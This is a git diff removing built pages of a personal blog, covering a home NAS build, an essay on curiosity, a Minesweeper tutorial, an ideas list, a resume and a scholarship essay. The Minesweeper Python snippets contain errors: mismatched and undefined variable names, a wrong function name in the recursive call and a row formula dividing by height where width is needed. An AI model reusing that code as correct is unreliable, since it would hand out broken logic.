-<p>I had run a scrub right before this, so there’s some extra detail in that.
-This is really fun! I will be doing more home storage projects soon.
-Perhaps Raspberry Pi NAS using all 4 USB ports to load SATA drives on it.
-Now that would be fun!</p>
-
-<h2 id="so-i-kinda-have-a-nas-now">So I Kinda Have A NAS Now…?</h2>
-
-<p>So right now I can only copy files with <code class="language-plaintext highlighter-rouge">rsync</code>, <code class="language-plaintext highlighter-rouge">scp</code> and moving data via a physical drive.
-The one major disadvantage this has is speed.</p>
-
-<p>Due to this machine being connected directly outside my network and pulling DHCP like a normal router would, I need to send my data through the WAN connection to get my files to it.
-This is rather unfortunate as my upload speed is capped at 20 megabits per second, despite my upload being in the 300+ range.</p>
-
-<p>Part 3 will involve a LAN card so I can connect both to the DHCP server of my ISP and my local router.
-This way my transfer speeds should be in the range of 1 gigabit per second.
-This will make my life much easier, at least on the local network.</p>
-
-<h2 id="fun-fact">Fun Fact!</h2>
-
-<p>Do not try to use the M.2 slot on a consumer motherboard where you are also using all the SATA ports.
-On my consumer gaming motherboard, the SATA ports next to the M.2 slot became <em>disabled</em> when I attached the M.2 SSD.
-I found this out form my motherboard documentation, which I read only after a week of thinking my motherboard itself was defective, and sending it in for repairs that did absolutely nothing.</p>
-
-<h2 id="thoughts">Thoughts</h2>
-
-<p>I like having all this space. I plan on using it up pretty fast, so I’m already looking at how to expand.
-Hopefully that gives a decent overview of how I set up my drives.</p>
-
-<p>Happy hacking!</p>Back in part one of my NAS project I discussed how I wanted to set up my hardware. Today, I set up the NAS (almost).Curiosity2020-10-26T00:00:00-06:002020-10-26T00:00:00-06:00http://localhost:4000/2020/10/26/curiosity<p>Curiosity is fundamental to a deep understanding of any subject.
-Masters, Ph.Ds, and other fancy name suffixes will never help you
-if you don’t have the spirit of curiosity burning inside of you.</p>
-
-<p>I was speaking to someone from a journalism major at my school when the subject of hacking arose.
-I expected her to know nothing about it, being a journalism student and all, but surprisingly she had something to say about it:</p>
-
-<blockquote>
- <p>“The best hackers are the ones who are curious.”</p>
-</blockquote>
-
-<p>That struck a cord with me.
-It seems to me she has nailed down the difference between the students who care about grades,
-and those who want to learn.
-These are not necessarily mutually exclusive, but in my experience they often are due to the way education is structured.</p>
-
-<h2 id="my-anecdote">My Anecdote</h2>
-
-<p>In my second semester at SAIT Polytechnic, I took a class entitled <em>Emerging Trends In Technology</em>.
-This class was probably the best class I have ever taken.
-We had to combine two things:</p>
-
-<ul>
- <li><strong>Hard skills</strong>: learning a new hard skill like Angular, Django, or GPG encryption.</li>
- <li><strong>Soft skills</strong>: public speaking and presentation of our ideas.</li>
-</ul>
-
-<p>Soft skills are not usually my area, but I can do public speaking.
-I grew up quite religious, so public speaking was drilled into me young.
-I liked to go off script and talk about interesting things I found along the way to the actual point.
-My creativity was not usually encouraged.
-That said, going off script is useful when teaching and presenting ideas;
-it gives a natural air to your breath and an unquestionable confidence in your speech.</p>
-
-<p>This is how we learn: in relationships.
-Try explaining ancient Japanese history to a computer science major, or UNIX sockets to an English major and you’ll see what I mean.
-If there is nothing for us to connect the knowledge to, it dissipates.</p>
-
-<p>So why did I do so well in this class?</p>
-
-<p>Our task for the semester was as follows:</p>
-
-<ol>
- <li>Learn a new subject (any <em>emerging trend in technology</em>) which you find fascinating.</li>
- <li>Give a one minute introduction by week three.</li>
- <li>Give a 10 minute non-technical overview by week 8.</li>
- <li>Give a 20 minute technical explaination and demo by week 13.</li>
-</ol>
-
-<p>This is the only course I have ever taken which lets students’ imagination run wild.
-Their presentation, their rules.
-They treated the students like adults who know what they are doing.
-What happened? Everyone stopped coming because “Oh no! Presentations!”?</p>
-
-<p>No, exactly the opposite.
-There was never more than one student missing.
-Every single presentation was at least moderately interesting,
-and most students were excited to come to that class.
-You could see it in their faces, the way they carried themselves.
-Every student picked something unique to their tastes, leaving every student more educated than before.</p>
-
-<p>This class, unlike many others, encouraged the curiosity of the students.
-It rewarded those who had unique interests and an ability to sell others on their ideas.</p>
-
-<p>The curiosity and the grades were one.</p>
-
-<h2 id="conclusion">Conclusion</h2>
-
-<p>Although it’s nice to have a course where these goals align here and there, anyone who has been to collage or university can tell you that is far from the norm.</p>
-
-<p>On the other hand, I never would have started this site if it wasn’t for that class alone.
-So I thank you, Kitty Wong, for getting me started running my own “research blog” (?)</p>Curiosity is fundamental to a deep understanding of any subject. Masters, Ph.Ds, and other fancy name suffixes will never help you if you don’t have the spirit of curiosity burning inside of you.Minesweeper Bomb Generation And Tile Revealing2020-09-12T00:00:00-06:002020-09-12T00:00:00-06:00http://localhost:4000/2020/09/12/minesweeper<p>When I was creating a little Minesweeper game, I got confused at some points.
-My bomb generation didn’t look quite right, and I for sure didn’t quite get the whole cascading tile reveal thing.
-With a bit of internet research, I found what I was looking for.
-I’ll explain it all in one place for my own research purposes.</p>
-
-<h2 id="bomb-generation">Bomb Generation</h2>
-
-<p>When I started this project I attempted to use a random bomb generator.
-By this I mean on each square, before it gets generated, give it a one in 15 change of being a bomb.
-Personally, I’m not sure why this never looked right.
-Something about the layout of the bombs did not mimic the classic Minesweeper game.</p>
-
-<p>After looking at some open source Minesweeper examples, I started to get the idea.
-I wrote some mathematical statements describing the generation of bombs and how to get their x,y position from an appropriate number.
-For those non-mathy people, don’t leave just yet;
-there will be code equivalents to the math.</p>
-
-<p>W and H are the width and height of the board respectively.</p>
-
-<p><span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mn mathvariant="italic">0</mn><mo>≤</mo><mi>r</mi><mo>≤</mo><mtext>W</mtext><mo>×</mo><mtext>H</mtext></mrow><annotation encoding="application/x-tex">
-\it 0 \leq r \leq \text W \times \text H
-</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8193em;vertical-align:-0.13597em;"></span><span class="mord"><span class="mord mathit">0</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">≤</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mord mathit">r</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">≤</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mord text"><span class="mord">W</span></span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mord text"><span class="mord">H</span></span></span></span></span></span></span>
-<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>x</mi><mo>=</mo><mi>r</mi><mtext> </mtext><mo lspace="0.22em" rspace="0.22em"><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow></mo><mtext> </mtext><mtext>W</mtext></mrow><annotation encoding="application/x-tex">
-\it x = r \bmod \text W
-</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.69444em;vertical-align:0em;"></span><span class="mord"><span class="mord mathit">x</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mord mathit">r</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mspace" style="margin-right:0.05555555555555555em;"></span><span class="mbin"><span class="mord"><span class="mord mathrm">m</span><span class="mord mathrm">o</span><span class="mord mathrm">d</span></span></span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mspace" style="margin-right:0.05555555555555555em;"></span><span class="mord text"><span class="mord">W</span></span></span></span></span></span></span>
-<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>y</mi><mo>=</mo><mrow><mo fence="true">⌊</mo><mfrac><mi>r</mi><mtext>H</mtext></mfrac><mo fence="true">⌋</mo></mrow></mrow><annotation encoding="application/x-tex">
-\it y = \left\lfloor\frac{r}{\text H}\right\rfloor
-</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.8359999999999999em;vertical-align:-0.686em;"></span><span class="mord"><span class="mord mathit">y</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="minner"><span class="mopen delimcenter" style="top:0em;"><span class="delimsizing size2">⌊</span></span><span class="mord"><span class="mopen nulldelimiter"></span><span class="mfrac"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.10756em;"><span style="top:-2.314em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord text"><span class="mord">H</span></span></span></span><span style="top:-3.23em;"><span class="pstrut" style="height:3em;"></span><span class="frac-line" style="border-bottom-width:0.04em;"></span></span><span style="top:-3.677em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord mathit">r</span></span></span></span><span class="vlist-s"></span></span><span class="vlist-r"><span class="vlist" style="height:0.686em;"><span></span></span></span></span></span><span class="mclose nulldelimiter"></span></span><span class="mclose delimcenter" style="top:0em;"><span class="delimsizing size2">⌋</span></span></span></span></span></span></span></span></p>
-
-<p>The code equivalent to this in Python is below:</p>
-
-<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">random</span>
-<span class="c1"># r <= 0 <= W*H
-</span><span class="n">r</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">W</span><span class="o">*</span><span class="n">H</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span>
-
-<span class="c1"># x = r mod W
-</span><span class="n">x</span> <span class="o">=</span> <span class="n">r</span> <span class="o">%</span> <span class="n">W</span>
-
-<span class="c1"># y = floor(r/H); note the special syntax python has for this operation
-</span><span class="n">y</span> <span class="o">=</span> <span class="n">r</span> <span class="o">//</span> <span class="n">H</span>
-</code></pre></div></div>
-
-<p>So that’s that, we can put this in a big ‘ol for loop and generate an arbitrary <em>n</em> number of bombs given a width and height of a Minesweeper board.</p>
-
-<h2 id="cascading-tile-revealing">Cascading Tile Revealing</h2>
-
-<p>This one is hard to describe;
-I am adapting this from <a href="https://leetcode.com/problems/minesweeper/">leetcode.com</a>.
-Whenever a player clicks a tile, the following logic should be used:</p>
-
-<ol>
- <li>If a mine is revealed, the game is over. (obviously)</li>
- <li>If a tile with <em>no</em> adjacent mines is revealed, recursively reveal all eight adjacent tiles.</li>
- <li>If a tile with one or more adjacent mines is revealed, display the number of mines next to it.</li>
-</ol>
-
-<p>Here is the code in Python for this algorithm.</p>
-
-<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">reveal_square</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">board</span><span class="p">,</span> <span class="n">alread_revealed</span><span class="p">):</span>
- <span class="c1"># if already checked
-</span> <span class="k">if</span> <span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="ow">in</span> <span class="n">already_revealed</span><span class="p">:</span>
- <span class="k">return</span>
- <span class="c1"># if it's a bomb
-</span> <span class="k">if</span> <span class="n">board</span><span class="p">[</span><span class="n">x</span><span class="p">][</span><span class="n">y</span><span class="p">]</span> <span class="o">==</span> <span class="s">'B'</span><span class="p">:</span>
- <span class="n">you_lose</span><span class="p">()</span>
- <span class="k">return</span>
- <span class="c1"># if the bomb number is more than 0
-</span> <span class="n">already_revealed</span><span class="p">.</span><span class="n">append</span><span class="p">((</span><span class="n">nx</span><span class="p">,</span> <span class="n">ny</span><span class="p">))</span>
-
- <span class="c1"># from -1 to 1
-</span> <span class="k">for</span> <span class="n">xd</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">):</span>
- <span class="k">for</span> <span class="n">yd</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">):</span>
- <span class="c1"># skip if it is this the center tile
-</span> <span class="k">if</span> <span class="n">x</span><span class="o">+</span><span class="n">xd</span> <span class="o">==</span> <span class="n">x</span> <span class="ow">and</span> <span class="n">y</span><span class="o">+</span><span class="n">yd</span> <span class="o">==</span> <span class="n">y</span><span class="p">:</span>
- <span class="k">continue</span>
- <span class="c1"># recursively check the adjacent square
-</span> <span class="n">reveal</span><span class="p">(</span><span class="n">x</span><span class="o">+</span><span class="n">xd</span><span class="p">,</span> <span class="n">y</span><span class="o">+</span><span class="n">yd</span><span class="p">,</span> <span class="n">board</span><span class="p">,</span> <span class="n">already_revealed</span><span class="p">)</span>
- <span class="k">return</span> <span class="n">already_revealed</span>
-</code></pre></div></div>
-
-<p>This has no checks for valid squares, but it’s the general idea.
-This function returns an array of tile coordinates which should be revealed.</p>
-
-<h2 id="conclusion">Conclusion</h2>
-
-<p>I wrote this because in the first place because I was writing my own Minesweeper game.
-I hope that this helps you with getting the general idea of a Minesweeper game.
-The completed version of this game is available on my <a href="https://lamegames.tait.tech/">lamegames</a> site.
-Let me know what you think!</p>
-
-<p>Happy hacking!</p>When I was creating a little Minesweeper game, I got confused at some points. My bomb generation didn’t look quite right, and I for sure didn’t quite get the whole cascading tile reveal thing. With a bit of internet research, I found what I was looking for. I’ll explain it all in one place for my own research purposes.
\ No newline at end of file
diff --git a/_site/ideas/index.html b/_site/ideas/index.html
deleted file mode 100644
index f10a0f7..0000000
--- a/_site/ideas/index.html
+++ /dev/null
@@ -1,73 +0,0 @@
-
-
-
-
- Ideas | tait.tech
-
-
-
-
-
-
-
-
-
-
tait.tech
-
-
-
-
-
-
Ideas
-
-
1. Accessible BIOS
-
-
Some server motherboards include serial UART/I2C ports which can be used to manage a BIOS via serial.
-If this is possible, would it be able to attach to a braille display via an intermediary like a Rockchip/Pi SBC or Arduino compatible chip using BRLTTY and serial input from the motherboard?
-Maybe not as it appears to require a full Unicode terminal, which I have the suspicion that BRLTTY will not be able to automatically filter out the formatting characters.
After emailing the authors of the paper, I found out that one of them, Rafael Machado, was able to get a song playing in UEFI as a part of his masters.
-Here is a link to the Github Msc UEFI PreOS Accessibility;
-he has links to YouTube videos where he is shown playing a song on an ASUS laptop with PCIe connected speakers: Song Playing in UEFI
-
-
I have downloaded and played around with his Github project but to no avail.
-Either I am not setting it up correctly, or I do not have the proper sound setup, but in any case no sound plays from either my laptop or desktop.
-
-
This requires more research and investment to understand UEFI, HDA audio, what systems have it and how to work with words and other sounds.
-
-
2. Terminal-oriented browser
-
-
Use selenium to allow a cross-engine compatible terminal-browser with JS support. Yes, sure, it has all the bloat of the modern web as it uses the full code of Chrome/Firefox/Webkit—but at least it can be used in the terminal.
-Guaranteed to be accessible.
-
-
I’m thinking of similar key commands to Orca/NVDA but output is send to the terminal. Unsure of how to handle aria-live regions, but perhaps a queue could be used to print text. Unsure how to calculate delay as the user may be using a screen reader at different speeds and/or a braille display.
-
-
Change backend on-the-fly with a page reload. So if a website doesn’t work with Webkit, load it in Firefox with a key command.
Identify seed health for machine learning algorithm bootstrapping.
-
-
-
- Independent — Tutoring (2019-present)
-
-
Working with computer science students explaining introductory to advanced concepts.
-
-
-
- Total Impact Signs — Contractor (2014-2016)
-
-
Implemented a semi-automatic payroll system replacing the manual sign in book used before.
-
-
-
-
-
Education
-
-
-
- Southern Alberta Institute of Technology — Diploma / Information Technology--Software Development Major (2019-2021)
-
-
Full-stack two year software development diploma. Focusing on databases, interface design, systems administration, security and enterprise solutions.
-
-
-
-
- Dartmouth College (Open Corseware) — Professional Certificate / C Programming with Linux (2020)
-
-
A certification in C programming, the gcc compiler, and the make compilation system. 100% mark.
-
-
-
-
- The Linux Foundation — Certification / Certified Linux System Administrator (2016)
-
-
Certified in Linux system administration tasks. Running web servers, maintaining mass storage systems, running secure remote control tools. Certificate no longer valid.
Question:
-How will this scholarship change what it is to be blind for you as you pursue your post-secondary education?
-
-
Answer:
-I have taken every opportunity of my short life to deny being defined solely by any disability.
-This essay will focus more on my educational goals and career aspirations on their own merit.
-
-
I would love your support in accomplishing these goals!
-
-
Goals
-
-
My current educational path involves finishing a diploma program,
-then transfering to a Bachelor’s of Technology program in cybersecurity and digital forensics at BCIT.
-
-
Cybersecurity was not an overnight choice.
-It became interesting to me over time as I saw ordinary people give up their privacy because they wanted their phone to tell them the weather—or some such other minor life enhancement.
-
-
Of course, it is a exaggeration to say that this is the reason people give up privacy,
-but consider the extreme case:
-You have your phone location on at all times;
-you own an Alexa which listens to everything you say at home;
-you text and call others using a service that openly collects the contents of your messages.
-
-
Would you want every single text you have sent to appear on the front page of the newspaper?
-What about every thing you have said in the privacy of your own home?
-Do you want just anyone to know where you were today?
-
-
If any one person had access to all this information about you, it would likely make you uneasy.
-I know it makes me a bit nervous at least.
-
-
One of the primary goals of my career is to build tools that empower the individual.
-Tools that make the individual more independent, not less.
-These tools must be for the average consumer.
-They must appeal to a mass market without compromising the secure, private foundations.
-This is my goal:
-Allow normal people, non-techies and techies alike, to just be able to send a text message without the world watching over their shoulder.
-
-
The second goal I have is to make this technology accessible to everyone.
-Security-focused apps need to be fast so they will run on less expensive phones.
-They need to be simple so that screen readers can process them correctly.
-
-
These are not hard things to do.
-In fact, I would argue that designing software this way: independent of third parties, simple, able to run on cheap devices—is actually easier than designing it the way large companies seem to design software.
-
-
Conclusion
-
-
I have a vision for how to build open, secure, private and accessible applications.
-Your help in moving that goal forward would be much appreciated.
I believe in solving problems.
-Learn how to solve your own unique computer-related problems by learning how they work underneath all the fancy buttons you see.
- 
- 
- ![A longer Ceasar cipher encrypted message: ROT2: Wpeng Vgf ku dqqogt ogog]](/assets/img/ceasar2.jpg)
- 
- 
- 
- 
- 
- 
- 
-